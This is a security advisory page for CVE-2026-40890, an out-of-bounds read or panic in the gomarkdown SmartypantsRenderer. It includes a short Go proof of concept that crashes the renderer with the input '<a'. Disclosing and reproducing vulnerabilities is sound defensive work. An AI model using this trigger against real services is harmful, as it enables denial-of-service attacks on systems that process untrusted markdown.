CVE-2026-40890
HIGH
GHSA-77fj-vx54-gvh7
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
DescriptionNVD
Summary
Processing a malformed input containing a < character that is not followed by a > character anywhere in the remaining text with a SmartypantsRenderer will lead to Out of Bounds read or a panic.
Details
The smartLeftAngle() function in html/smartypants.go:367-376 performs an out-of-bounds slice operation when processing a < character that is not followed by a > character anywhere in the remaining text. https://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376 If the length of the slice is lower than its capacity, this leads to an extra byte of data read. If the length equals the capacity, this leads to a panic.
PoC
package main
import (
"bytes"
"fmt"
"github.com/gomarkdown/markdown/html"
)
func main() {
src := []byte("<a")
fmt.Printf("Input: %q (len=%d, cap=%d)\n", src, len(src), cap(src))
var buf bytes.Buffer
sp := html.NewSmartypantsRenderer(html.Smartypants)
sp.Process(&buf, src) // panics: slice bounds out of range
fmt.Printf("Output: %q\n", buf.String())
}Impact
This vulnerability will lead to a Denial of Service / panic on the processing service.
-- The Datadog Security Team
AnalysisAI
Processing a malformed input containing a < character that is not followed by a > character anywhere in the remaining text with a SmartypantsRenderer will lead to Out of Bounds read or a panic. The smartLeftAngle() function in html/smartypants.go:367-376 performs an out-of-bounds slice operation when processing a < character that is not followed by a > character anywhere in the remaining text. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Share
External POC / Exploit Code
Leaving vuln.today